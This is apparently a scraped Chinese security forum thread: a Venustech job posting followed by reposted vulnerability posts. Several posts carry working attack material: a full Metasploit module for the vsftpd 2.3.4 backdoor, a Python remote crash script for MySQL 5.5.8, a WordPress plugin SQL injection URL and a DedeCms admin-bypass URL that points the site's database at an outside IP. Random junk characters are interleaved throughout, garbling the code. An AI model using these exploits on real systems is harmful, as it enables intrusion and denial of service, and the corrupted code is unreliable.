最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。1 O8 G# H( v( d% D+ M
    " [) V  O' g- l) W3 f  @

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.' x5 ?& K* M% |6 {
    安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.1 g, J2 O3 n. F8 G1 `2 O# N
    精通C语言编程

    2." C5 n. H1 a! ^' q: H
    熟练使用Linux操作系统,精通 Linux下C语言编程

    3.
    # q" h+ k- a/ A精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.
    ( B. f0 c0 n3 P+ A熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    3 k7 {+ U) U7 y5 m: o% q8 u熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.7 B' I. w" @" ?% b1 r$ Y+ ~! h
    负责产品的系统测试、集成测试工作

    2.$ ^7 l) Z8 U2 C! ~( ^1 q7 Q* \
    负责产品用例的编写,执行、修改

    3.
    + M; C2 K' R5 V3 G# E$ P+ P1 ^' r负责产品性能的测试

    4.& o# Y, u+ h( D9 F& L9 b
    负责对外项目的支持和测试工作

    岗位要求:

    1.! X% O- z) H2 h5 P
    掌握基本的tcp/ip知识

    2.
    7 V% d8 B- S4 M数通基础好

    3.
    7 S% }0 E: N7 S  e对linux有一定的基础

    4.+ F& B! K' _8 B+ q
    掌握数据库的搭建和使用

    5.
    3 `+ \! I+ e2 {( f: h+ g至少熟悉一种编程语言C/Perl/VBS/TCL

    6.) o: Z- Y: H( _! U3 l+ G3 F5 n% S1 ~
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.
    1 P2 \9 U) u* X0 v熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.
    6 X/ k. S* P0 L' X- b0 D2 n0 B对网络安全设备在网络中的部署有一定的认识

    9.+ L) H. v" ?( d8 d3 _5 `* U% s! t1 n
    掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.& R, ]' P/ c; |$ Z, b
    木&马检测服务、WEB漏洞扫描服务的实施

    2.  Q) Y' S* z" o/ \$ \
    对服务客户的技术支持

    3.
    " C: S4 Y$ a: h3 q4 {
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    * z7 s, E5 u: ^4 [
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    / A% G. R) u6 u
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
    " b" j, Q  p. ^, R5 Q) {% G
    9 ]% j5 I4 N+ s$ V% `0 L4 f1 \9 C/ d0 M2 a* W6 l/ V, ]8 i# W
    : |9 e1 z9 R2 d) p
    require msf/core
    + G2 [3 v* X! M3 u/ @# v! Z% \- }& F. r* M- s
    class Metasploit3 < Msf::Exploit::Remote
    4 w: @  |; ~( q. kRank = ExcellentRanking/ }7 Q9 c' A7 g3 W# x3 [5 B% l
    3 h3 Z/ v/ E5 V0 u% `/ ~& J
    include Msf::Exploit::Remote::Tcp+ S3 r" T7 p5 l9 f8 N

    * r8 {$ e; {' odef initialize(info = {})0 g( I7 V; Q3 B% x) Y
    super(update_info(info; L2 N0 v7 s7 ?$ K
    Name => VSFTPD v2.3.4 Backdoor Command Execution
    0 X1 I0 R' F0 kDescript_ion => %q{0 v4 g& A! q" _5 l
    This module exploits a malicious backdoor that was added to the VSFTPD download
    7 Y+ y$ b/ i4 h( tarchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between- [/ @& w/ z: @1 A" B
    June 30th 2011 and July 1st 2011 according to the most recent information
    , |+ s* P; X" Wavailable. This backdoor was removed on July 3rd 2011.
    . D/ e( @2 @* D5 b}2 W1 j; X. H6 A# y$ w1 [& A
    Author => [ hdm mc ]2 d. X( z8 B( y0 t/ i) F. G
    License => MSF_LICENSE
    8 U. }- N2 j2 y3 {! gVersion => $Revision: 13099 $, y. M% J1 X! V+ s" U2 ?. S  C% T. M
    References =>
    1 k( E1 S) Y. _0 D5 w[
    - @9 }3 N' C/ C[ URL http://pastebin.com/AetT9sS5]# Y( h' N9 D* F; {
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]) G$ T- D+ g. p- I& U
    ]$ {4 V! S7 D2 ?
    Privileged => true) |0 v" M# X, t8 Z: ]
    Platform => [ unix ]
    $ a( f/ G$ I+ t' AArch => ARCH_CMD# Y/ p  K  d3 n4 b
    Payload =>
    & l. h# x* J" q* l5 m{
    5 H( D* |: @6 tSpace => 2000, u, c% T0 e0 f7 T1 @7 p7 L
    BadChars =>
    % H5 T7 {8 `) S8 }DisableNops => true
    % n3 I' Q) \( hCompat =>
    + W" d* t/ q5 s. A. t. ^( r' j4 E{
    & ^- V) a  b( {) m4 K. K5 y/ P5 LPayloadType => cmd_interact2 S4 c) S/ r$ `& g. Z3 |
    ConnectionType => find' H8 {  E6 l9 Q) Q6 q& T* [/ T
    }
    # _" p: H2 c( R5 l9 a}
    . @7 [1 b# H: ~/ L8 T+ q, F( ITargets =>0 h  z; K+ _. j: M# s" x0 G$ ^: m" k0 ]
    [
    1 m  W/ C( ?& O7 i[ Automatic { } ]
    . x! _& \) [+ J! k( ]7 ]]. e9 T6 f: F. U/ F
    DisclosureDate => Jul 3 2011
    : g  T- i3 I" A1 gDefaultTarget => 0))# a$ D3 x+ c. S; t7 Q
    6 W* G+ f7 K/ S* x3 }! x
    register_options([ Opt::RPORT(21) ] self.class)5 z( U- N- }/ Q3 E+ Y, c6 F
    end
    8 z+ E0 p) E% i+ H; a# n" u3 s/ l
    def exploit1 r5 f" D4 ?. Q0 m% j% y0 s

    7 Q0 c. }; H$ S6 Tnsock = self.connect(false {RPORT => 6200}) rescue nil" U$ H6 c4 c9 I9 x
    if nsock
    8 I' z  p" m$ M; i% M+ m- }print_status(The port used by the backdoor bind listener is already open)
    $ _7 K: O7 X$ xhandle_backdoor(nsock)
    & C$ u6 g* G2 W: G) z. m; x+ M- C! wreturn1 \' `: s: j  f! o% l
    end! y  D6 c- t4 O5 ]
    * b9 @0 o5 K0 S/ r5 P
    # Connect to the FTP service port first1 c& A' p' d) A4 B+ {! T6 G4 h6 j
    connect1 p& l7 |! s0 |, J

    6 Y9 x# Z+ j: R7 sbanner = sock.get_once(-1 30).to_s
    4 {0 n0 K/ L# h! O; k2 sprint_status(Banner: #{banner.strip})
    ! q! j1 h( A& ?5 M4 W
    & _, ?% r% K* J2 f- {$ `sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)2 g3 Q* p7 `9 R& p# O6 @  C
    )
    & l) i! H1 r0 xresp = sock.get_once(-1 30).to_s$ ]' p& K) s) W3 @
    print_status(USER: #{resp.strip})
    ( @" I+ q: e: \+ N" f- Q5 _6 e* N. O9 x7 s' J! A8 B3 M; o
    if resp =~ /^530 /$ k" g( K& J# G- B. c- c4 i
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached). n6 G+ X& `# T, d3 C2 d
    disconnect. Z1 j. Y7 ?& `0 A. D" o* u! [
    return
    4 x# _3 u/ C  a0 R9 @1 }end
    / ]7 e8 p' q) I+ i6 E. s2 T  N
    1 s3 z" J3 c1 X! y' R. V8 @5 h7 xif resp !~ /^331 /
    1 ]! m% W% K1 O4 eprint_error(This server did not respond as expected: #{resp.strip})& F+ J; ?& h* [# v% t
    disconnect
    : y; r7 x% O7 K, areturn
    ' n& u9 J7 V( @8 B9 Kend
    ( N- o+ O* W/ y# ?1 v5 F. ?9 f) @: }' A4 ]; O, x
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}5 a: f/ j9 G5 y$ }( ^8 V
    )0 n7 S$ ~+ R) Y; p
    7 c  o9 a$ w. Z& G9 R! Q/ ]
    # Do not bother reading the response from password just try the backdoor
      ?, P0 O5 ~5 c2 Nnsock = self.connect(false {RPORT => 6200}) rescue nil3 m' V# {8 B# j6 G; z" y/ U
    if nsock$ {1 a0 Q  i4 K  N0 M7 c- o
    print_good(Backdoor service has been spawned handling...)
    8 d9 V( f5 Y- f9 P7 ^, jhandle_backdoor(nsock): ~+ Q% |0 h% r5 ]2 U
    return
    # }6 c7 W( S: vend$ v7 D$ M) g" P4 {& V& ]( F! ~
    5 S" C; c) O# q* i1 z  F, V8 }# h
    disconnect
    * c/ @3 D! z4 @$ ~' ?3 Z, u4 j
    2 ~- Y5 g& k! q! M% _/ O7 x5 _end0 F0 g+ U5 _  r0 J1 p3 d4 l
    9 Z  L& P' Q4 l. K: I
    def handle_backdoor(s)
    ( R$ g0 u4 T# f  x" `* \5 B' Q8 `; y% c; s. Z
    s.put(id
    - c: \& `0 w- B: p. ]6 B)( L/ ~5 i$ U) O+ n. M) q% j2 S0 K
    * F: t! l; s1 z- M5 c8 P. }7 o
    r = s.get_once(-1 5).to_s$ H  x! W7 V$ Y( [3 c3 D
    if r !~ /uid=/
    6 S, O' D1 O! G1 u- `: jprint_error(The service on port 6200 does not appear to be a shell); `8 G: j8 L2 w7 G) n$ M; }. G5 ]' R5 u
    disconnect(s)
    , s" _! {3 \( d7 @1 Breturn3 h$ @. k) R% n5 n4 q# H
    end, x5 K/ q. G9 f  J' M5 o
    + s7 n( a; d: d) r9 x
    print_good(UID: #{r.strip})
    - ~4 ?9 m% d0 k! U+ w# `# c% }( U% [8 e4 w- g( O1 g  |8 m* ~
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)( J# |& ]7 l* o9 Y" u
    handler(s)
    & L/ I  C9 C. E3 `, O  ^& lend) O! V, x4 I4 w6 F" S, H/ w0 _0 S" s

    6 F5 P. G/ K5 ^, y; f6 M- Eend复制代码4 z$ Z+ R! E- _
    ' k, Z3 u) S- C
    * J% D, ^! h7 ]: }% ?$ [

    4 U0 A# }$ T, Q& _2 P% N9 z0 d& j
    4 b4 U( `/ d& A7 v* p8 n' @4 ?9 a+ @1 l8 d4 D
    ; R2 j9 ]+ \9 ^$ i; O# x6 j
    $ v8 A) M% u) f+ S. h& V
    6 z, _7 h0 K! e
      V* d$ E+ ?3 z( D* K; n5 w
    % D! `  Z- p% s' V  c5 V  Z) f3 O

    " d& g4 B% [4 G% G! K; \/ E  P/ x* ^: I" c0 X3 V0 e
    $ D) R6 d; B$ b& [4 g5 [' E) f
    + u3 k$ d% w# {# V

    6 R4 z( ~& r6 k. _$ _
    , M5 ~/ ^, ?% b# H/ S! e  y, Y& E, D9 H- F2 k* a5 R5 E! L  z2 S
    ' I5 r( l0 u. z- d
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:
    * f2 v# \" t/ z- w/ m) n  
    ' u7 b9 |" U( y/ p- P     
    , F5 Z7 o: f; V5 E0 G  7 r. O8 f: _/ B$ D3 x( m, O
    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress& {% K( e7 |4 s$ Q% a
    allows an authenticated user to execute arbitrary SQL commands via the id- E  \; h/ j3 B3 ?$ p; o% v
    parameter to wp-admin/admin.php. 6 r2 o  v! }% O/ Y2 N# E# h  \
      $ r1 t: e$ ^* b4 U, f' o. ]
       * q; ?9 c, \. b) q: l  S( _% [
      
    $ C/ i. [) B1 g' B2. Proof of Concept:
    , O1 D7 t' L$ s, @# N6 n: U  
    " R2 S. p- ~; e+ o! C   + u' @/ C1 I2 |" B
      8 g- J5 B3 p  ?* U& e- W
    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
    7 q% f( E' d. x& j, t; d5 I. `) p=1 AND SLEEP(10)6 `, K' R! J0 O' \

      {' A- w, C2 s/ v. e  N) V; J4 G  
    7 V. ~7 V5 _, {   7 T9 w( ]$ e: b2 b6 X
      
    ! b6 D# y6 b3 P& R$ ]3. Solution:
    5 y" Y! [) @, o, u1 u  : a- @1 w: M# Q0 E& R8 G
         
    - Z) z( t" x+ Y. E' F4 {  
    6 U( r% l2 G: ~$ N" vThe plugin has been removed from WordPress. Deactivate the plug-in and wait6 k. z3 c% C" [2 J# U
    for a hotfix.7 V& g* r& m7 [, |2 n0 i* ?: l
      
    ! A* @7 y, e/ y3 k9 m/ s   " \, M( W1 M) l' s* Q" b
      9 k+ L( c) ~1 t+ l. j
    4. Reference:
    ( L- {1 `, d6 d7 L, T' \  7 e7 `% a. ^$ I6 ]+ c& L" \+ ]! r
       5 a2 \& C7 J1 {7 ^
      * }. D  ^. ]/ a7 H, f/ W4 Z( L( q
    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje8 M- e! o; w' }4 O" i
    ction-sqli/" ~0 V* y, U, p- v/ Z: S: |1 x+ I
      
    1 |6 R# q- r  i! {$ c9 ^0 Ihttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    ) K7 w0 n& L' h; i: N4 }9 j6 V+ i, Z9 N( O# _+ G
    ' k' z) e  C5 U$ U
    % Y6 c& C8 K! T) Y" e

    / I& |. v& b. X6 n6 {) S: }( ~4 ~( J9 M, x6 c0 j) I( |

    , t5 B. P: f6 D0 t9 l
    2 }) u4 j3 g6 R
    - t, H0 m: v" _% I# m8 c
    6 H% G; o. N3 y! s; ]" `, D" k6 ^, S5 R/ c# ^

    ; H& c  T# Q( l/ F* ^1 q
    ) H' \) Z/ \' z
    # U6 k4 c& g* ^5 s+ s$ Q& o/ X  L2 D
    : y7 ^# E& O6 ?! Q/ b8 E2 l2 v
    # m8 C1 Z& _$ M2 ]2 a/ @8 y# I$ X$ M
    ) n* h' V; i: g5 P2 d) O' ^5 n6 |

    . G8 p# c& n7 l! W公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    9 H9 f& B6 m& P" C% j0 |3 p
    2 p+ n2 r1 Y" e( A5 ^( i6 iprint "7 [( J& r1 l4 ~
    "0 h3 u9 M& p( ?! m- D) I
    print "----------------------------------------------------------------"
    : D( f' |! e1 k# e- i+ @print "| MySQL 5.5.8 Null Ptr (windows)                                |"; |+ }/ \, T' D1 T/ I+ _0 [7 M- N5 p
    print "| Level Smash the Stack                                         |"
      E/ @- }: G+ o& m& y$ Jprint "----------------------------------------------------------------"
    . X6 Y0 b7 C6 g/ P( Sprint "
      ?1 s, T3 T, P8 N"
    # A4 s; R5 h& `! q# b- X 0 T, e1 M! W2 A) R9 ~2 B
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    - V. T1 s( n1 R) S& A"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")+ T8 z( ]: |1 }- M$ A
    2 B0 H5 b3 |8 _9 Q  a9 m6 U+ v! p, o% a" \
    buf2=("x11x00x00x00x03set autocommit30")# H. J7 w7 K8 J0 ^$ N' q: N2 I' n

    5 z3 A7 L* V, tdef usage():
    % j! I8 j/ z3 ]% y1 G1 fprint "usage : ./mysql.py <victim_ip>"
    ) A  B6 J+ s7 Xprint "example: ./mysql.py 192.168.1.22"
    4 _) n- W( H/ k+ J5 J 9 V5 {/ c6 p- i( v
    - X) V, s2 X# Q/ f7 Y/ N2 U: A
    def main():
    3 B7 [- v7 X% `9 G' D: qif len(sys.argv) != 2:
    . z2 @5 R4 p$ y7 Wusage()* J1 ?: n, K. g# j7 z- h
    sys.exit()
    . {- Q  M; m, V' e5 y/ Js = socket.socket(socket.AF_INET, socket.SOCK_STREAM)7 p8 `% T1 g4 _7 y& t

    . K: F9 v% i% c' [) ?# s/ p5 C( h; X5 SHOST = sys.argv[1]; c7 r4 o( e5 `
    PORT = int(3306)/ ?* m0 }6 Y6 b8 ]2 `
    s.connect((HOST,PORT))7 @# _) S$ c0 R: k1 [0 R* |5 @# j
    print "
  • Connect"8 U! `( F; n# ~! s
    s.send(buf)
    8 X* I& W/ l5 y' E; E3 {) Tprint "
  • Payload 1 sent"; C4 y1 F4 s% F8 u7 S
    s.send(buf2)
    " c1 X4 P/ z1 L3 t+ c8 q6 Iprint "
  • Payload 2 sent9 p! S9 b, ]* }( }. e. i, B1 b+ H
    ", "
  • Run again to ensure it is down..# [; a7 j: T9 [; e& E
    "
    8 k6 d, @, Y) J9 `4 S7 ?' Cs.close()
    & |9 N- P/ O4 b- e: Y/ ?( r+ u6 i ; c7 c9 N4 h6 H2 D& u
    if __name__ == "__main__":( L3 D7 n3 B6 f! j2 A
    main()3 A6 m% y, K( r8 K# G

    ) @% u/ t8 v0 k& ]* U
    , i2 b+ |  N- ?+ M- B  D# |" T# K/ U
    5 X) L+ ?& j6 Q! B3 A( X% Y- I3 B

    6 v0 y3 b' I! i
    8 l$ G! Z$ ^/ k3 U' m1 c6 g1 C5 I+ ?6 b& q4 ?4 R' a1 ^* M4 m" ?
    % k4 p# W. q$ ^
    , h. s) Z4 p* z- e: ~( h  {
    3 Q7 H" \& }7 u: u9 P0 \7 y

    7 u8 o1 U" p; H0 N9 I2 l/ T$ |- p4 l* _3 ]
    6 q& z# g' l' X8 L( }) {
    ! W. {  t+ Z+ q

    ) D. |; J. b4 k( v) |+ U  U1 j6 N3 ^( j2 j" {# u
    4 O. g! p5 T: S8 Z7 M
    " c2 L/ D8 K  Z$ p% k' m4 w. T) J
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
    " R* T$ ^! m; r' @; P5 v' ?  ?  w
    http://www.sitedir.com.cn/video/4.swf. C( Q) N! V! S8 a6 c

    . L6 _# v( n: {' M4 t2 f  Y: q8 ^# M6 m4 m
    " m, [* H0 {. f

    0 C. P0 m% ?0 y6 ^8 x) M+ }1 z
    7 S  H. O- l" B. `" ~  x% J0 P
    0 [7 Z3 D, R4 f/ C9 L' q7 W0 [
    ( C) }1 q: ?& x! A, s; R
      y8 u4 N6 `2 r3 G8 V/ r5 p& B2 m  n, ~( z6 L
    + _3 w  F+ L7 L8 \( P

      Y# _( B. L2 r( o1 D8 g
    & q+ a, N2 X& Q* g) M. e% ]4 l0 e9 P" B) ~; O2 }3 w9 i
    5 a$ u5 c) t8 F" F

    ' M; E3 S7 ^) W, l( V! C
    $ p1 l; O9 J; f3 d. {3 q$ z9 T
      Q1 s/ g& p& A+ S0 u
    2 @8 V& B5 |2 \0 ~7 v2 p# M公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    / u2 z1 [  G, w8 R4 x
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    1 n1 P+ h4 j' m0 G4 q4 o
    此漏洞的前提是必须得到后台路径才能实现

    & z/ R# i% V# B0 t, h
    官方临时解决办法:

    + ?, {6 z, Q! k/ _6 C: S3 ^
    找到include/common.inc.php文件,把:
    # w1 `& [  r0 e* H8 y+ r" A7 a
        foreach($_REQUEST as $_k=>$_v)
    & \8 e/ I) P1 A: A' K0 N- G* {4 g    {
    , r. Q9 y% U0 d+ j' V2 D  G! Y        var_dump($_k);' {$ v- l! \9 Y5 _1 u
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    : o4 _3 ~- f( W' h2 A        {
    9 I8 |6 E: [% [8 ?2 q/ o- K            exit('Request var not allow!');
    0 K* [  ?' t% K1 k1 K- F        }6 E* K$ y) M2 z2 Q5 p3 I' }' `
        }

    , S" s! h: I# F; ~
    换成:
    6 C) L6 z2 a6 A+ E0 [6 X, }
        //检查和注册外部提交的变量
    * _: C" \5 A' U" T& ^    function CheckRequest(&amp;$val) {
    + V, K, [1 I; @- e5 v1 ~        if (is_array($val)) {$ Y7 X4 F6 n3 P, W
                foreach ($val as $_k=>$_v) {
    2 E) I1 e: P- o' t$ D0 x" C                CheckRequest($_k);
    % q1 r$ p* R( B2 [9 ?0 z4 N                CheckRequest($val[$_k]);
    " A+ R: I8 q4 ~  i            }
    3 ?1 M' Q) e& x        } else: Q8 F" A% {2 \6 K! N0 A0 Z
            {( P3 d% e  N* n3 b
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )% U. l4 W# j6 t' p2 u0 Z" J& ~" t
                {# b* a  h) y& c/ p3 m
                    exit('Request var not allow!');8 h& d: ^. l2 a
                }; A% r  Z9 d6 Z7 b2 Z1 _- H  W) e
            }
    5 q( x0 o7 [7 J$ W* d    }
    % b. D: [3 o0 U( X4 ^    CheckRequest($_REQUEST);) i. u/ @- T/ E$ Q2 H' y. {
    & P% [) P' Z0 p& v6 Q2 d

    * Q/ Y: {5 `, W( X& @! N, z; U0 I' w  b! n" L) X+ u4 `4 x

    $ o+ c, G( |# f9 Q6 m  q9 n: [) E3 H8 o' h- y# p# i( c! j
    ; h& z+ E% y/ g+ C
    8 T5 N7 I/ j( y0 Z
    5 I  b) r; ^8 d/ F2 ?; ~

    - d. f, |  ^9 P) o3 p5 m3 }6 U! i; U  y

    4 R. e7 R! a: {- g
    ! G  ^$ w' {; h8 {
    4 `2 g, V0 [6 ?" [
    + t# N/ `, F' V9 S* I; F
    5 o* c5 J5 _5 Q  x: t
    9 t+ L9 ?* o0 z% N4 f0 L" y
    & J* G% Q" O9 ]: H3 T) d3 v. D8 v, o' n2 m! O& A
    1 y5 O" z% k; c$ ^% w
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>/ n& o& ^0 S# l8 M7 W' _" q" Q

    7 K5 l/ }; a6 B3 y% y4 C, Phttp://www.sitedir.com.cn/video/8.swf[/quote]3 A/ i4 @" S  s) c

    4 r# T* n: g6 S* m3 H( P$ ^) Z+ m$ q
    2 m8 {$ ^) A2 }. d9 _7 L

    1 U) i2 d# E4 x: |5 V
    3 g% N7 Q6 J$ Y2 ^  ]4 M, v4 c5 L: R" Q8 G# g" z
    ' r# }5 k. M2 @" J) V" s/ i
    : {; S/ m- l5 j: l0 `5 f6 z

    ) w  s- f4 j+ g, p
    ! i0 D2 H# L& }' t
    + Z& H; U* J0 [  s" ^
    9 z5 w: v$ {) Y  M. Q2 d9 h6 X9 G2 S+ {( M7 B/ j4 D: Q8 l+ v
    5 w2 e6 J4 @0 ?5 j; v: H- T4 a4 B

    , h1 ], v  B6 I& l9 J8 V% C. n5 q4 {5 Z5 ], }6 g2 b+ U% l

    4 \: f9 {$ S0 r; c, Z3 u' S/ M0 \/ I% B. U* _
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    & y4 a& Z1 O' Q+ I, V
    影响版本:; M$ U) q: b! K
    Django 1.2.56 E8 U- f% R: R8 N
    Django 1.3 beta 1; h8 C) `3 C$ t
    Django 1.2.42 L) F3 H& B5 D- E0 l+ y! H
    Django 1.2.2
      [2 Z4 {4 C0 w2 uDjango 1.2

    # u  u6 h& {0 ~5 {* C# r& h0 H
    漏洞描述:

    # B: R* M& C$ f+ h! g. J* u& S
    Django是一款开放源代码的Web应用框架,由Python写成。- h3 ~+ i( O  m* R" a0 j3 ?
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。. U( {+ n. u  t- X. a
    1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    - h! S- W# Y% p; A- s. C4 E2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。
    8 J* ]1 l0 ?2 G4 {9 b3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    + w) a% g4 R; y4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。

    + \; t- X1 W% K
    细节参考:
    7 |- ^' T" f' e0 whttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/5 T0 Q  u* J9 c% r! [8 c& J. o  L
    http://secunia.com/advisories/45939/

    3 v; F4 r; J2 J6 f! |$ p
    . J6 [3 b; R, B7 K, P  @7 d

    5 X! R  U2 d: q; w7 a0 s2 h3 Y3 H% h
    $ p- ~8 w7 ~1 Y' x* \
    ( M) P: P& w' X7 v* a: u
    0 |0 p3 V5 l' X6 \% D# g" b, l7 X- s

    / O3 p3 |, d" s; Q" d2 D9 R8 K" d- R4 L2 r+ n+ f

    % h' ^' D4 p5 }
    : s0 l1 O8 j% b4 H5 ?5 c- T4 @: u" `' u! o6 Q5 X; @; N. K7 @

    0 S) M; y6 \7 o( d0 Z' m7 T3 Z! u' L4 ^& J0 _8 ?

    / r9 C# L, h' }6 T, K/ H* s* }: U% V. i

    " {8 n% L, u5 ?7 O/ H5 I& V- g( W) X
    + ^$ F- u8 [2 E" _( L/ a
    * F7 u3 E7 }! q) i8 x
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
    - o8 N( @0 g+ t: f* p  l影响版本: McAfee LinuxShield <= 1.5.18 G' N& ^; w/ l# C7 ]) v( e5 Q  j
    远程攻击: Yes 3 x8 i. i& y) B6 J
    本地溢出: Yes# g% o, k! E& A& Z! t- ?
    背景阅读:
    : r( U- a1 c: t/ \- d) z, @===========
    8 V, E0 i) e. \" }
    * u, S4 q5 _: Q9 S. `5 U+ }" NLinuxShield detects and removes viruses and other potentially unwanted' n) E) V7 Y8 b* a3 R
    software on Linux-based systems. LinuxShield uses the powerful McAfee$ ]+ _4 N0 y" J
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our4 Y; H  T, v6 F
    anti-virus products.
    & B, |! V; w5 i/ B( S
    : G! c" T2 a1 c$ @' ^5 ~0 AAlthough a few years ago, the Linux operating system was considered a
    : a) r0 N/ A. Nsecure environment, it is now seeing more occurrences of software
    9 I+ ~2 P* f$ u* S/ D! C$ f4 a2 @specifically written to attack or exploit security weaknesses in
    - [$ A8 \9 B* lLinux-based systems. Increasingly, Linux-based systems interact with
    ; Y: |0 w! T, u9 `# b! C# @5 N7 ~Windows-based computers. Although viruses written to attack Windows-/ x% T5 n7 D' m8 W  q
    based systems do not directly attack Linux systems, a Linux server* d; `" x* c" f* k2 D% L3 S) d
    can harbor these viruses, ready to infect any client that connects to9 Q8 e: t3 {; \  K( `
    it." X& u& b' i& v
    2 T: H% [! e+ l: ~. l
    When installed on your Linux systems, LinuxShield provides protection
    9 b* e! @+ O4 s$ I' ?4 F% X: bagainst viruses, Trojan horses, and other types of potentially
    6 s0 z; b. z& I5 k/ hunwanted software.; T8 |  M5 Z$ H

      R6 F! ^, E# n6 ]6 L0 s3 |6 I- M% tLinuxShield scans files as they are opened and closed# E& @7 @) `% _% A0 ^# B- j
    ?&amp;#65533;&amp;#65533; a technique
    * t" D) @' h3 m5 xknown as on-access scanning. LinuxShield also incorporates an
    6 J1 F/ K( d5 Z7 d. _: D$ qon-demand scanner that enables you to scan any directory or file in
    6 C, n0 S5 x- H6 W  J) I# _8 Pyour host at any time.
    # u$ Z/ m/ `2 D7 J" `/ T2 d1 A
    4 A& S. T# M% y. dWhen kept up-to-date with the latest virus-definition (DAT) files,
    , k5 B) ?4 q/ B$ L3 ?1 s7 S1 f: ]LinuxShield is an important part of your network security. We2 h' w" z- U# T* E: d; r% U8 `
    recommend that you set up an anti-virus security policy for your7 M- j* J8 x% z  x: Y7 y' ^
    network, incorporating as many protective measures as possible.! o- K' V' `, J% q  p$ X
